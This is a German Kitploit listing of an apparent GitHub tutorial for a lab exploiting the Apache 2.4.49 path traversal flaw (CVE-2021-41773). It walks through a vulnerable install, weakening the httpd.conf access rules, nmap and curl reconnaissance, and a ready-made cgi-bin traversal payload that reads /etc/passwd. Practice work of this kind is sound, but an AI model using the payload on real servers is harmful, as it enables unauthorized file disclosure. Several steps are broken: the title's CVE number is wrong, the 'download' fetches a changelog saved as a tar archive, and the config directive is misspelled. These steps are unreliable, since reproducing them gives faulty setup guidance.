Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-4773 — Schritt-für-Schritt-Tutorial, das zeigt, wie man eine verwundbare Apache-2.4.49-Umgebung einrichtet und CVE-2021-41773 Path Traversal mithilfe von Kali-Linux- und Ubuntu-Server-VMs ausnutzt. | Kitploit
Tools/GitHubGitHub/alexs18/cve-2021-4773
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubalexs18/cve-2021-4773

CVE-2021-4773

Schritt-für-Schritt-Tutorial, das zeigt, wie man eine verwundbare Apache-2.4.49-Umgebung einrichtet und CVE-2021-41773 Path Traversal mithilfe von Kali-Linux- und Ubuntu-Server-VMs ausnutzt.

Repository anzeigen
3vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-4773

Dies ist ein Praxisbeispiel, wie die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausgenutzt werden kann.

Für dieses Tutorial benötigst du Folgendes:

  • eine virtuelle Maschine wie Kali Linux
  • eine virtuelle Maschine wie Ubuntu Server
  • Apache Version 2.4.49 installiert

Also los geht's. Wenn du zwei virtuelle Maschinen laufen hast, installierst du Apache Version 2.4.49 aus einem Archiv-Repository. Du findest diese Version hier: https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Installation und Konfiguration der anfälligen Version auf dem Ubuntu-Server

1 Als Erstes musst du auf deiner virtuellen Server-Maschine den folgenden Befehl ausführen:

curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  oder wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2

2 Als Zweites musst du diese Version von Apache wie folgt entpacken:

tar -xvjf httpd-2.4.49.tar.bz2

3 Installiere das folgende Paket:

sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 Führe die ausführbare Datei im Hauptverzeichnis (Dateiname configure) aus und verwende das Flag, um das Installationsverzeichnis anzugeben:

./configure --prefix=/usr/local/apache2

5 Kompiliere die anfällige Version:

make

6 Installiere die anfällige Version:

make install

7 Überprüfe die Version:

ls /usr/local/apache2

8 Starte den Prozess:

/usr/local/apache2/bin/apachectl start

9 Überprüfe den Prozess:

ps aux | grep httpd

10 Konfiguriere die Schwachstelle: Finde die Datei /usr/local/apache2/conf/httpd.conf und konfiguriere das Verzeichnis admin. Finde den Tag directory und ändere Require all denied zu

  Required all granted
  

Finde den Tag Files .ht* Required all denied zu

  Required all granted

Die erste Änderung dient der Ausnutzung der Schwachstelle in der lokalen Umgebung, die zweite der Offenlegung in der realen Umgebung.

Ausnutzung der Schwachstelle in Kali Linux

1 Scanne die IP-Adresse mit nmap mit dem folgenden Befehl:

nmap -sV ip_address

2 Führe einen curl oder wget durch, um den Apache-Server zu testen:

curl ip_address oder wget ip_address

3 Überprüfe, wie die Schwachstelle auf der folgenden Seite ausgenutzt wird, wenn du die Syntax verstehen möchtest:

https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

Oder verwende einfach das folgende Payload:

http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Tool herunterladen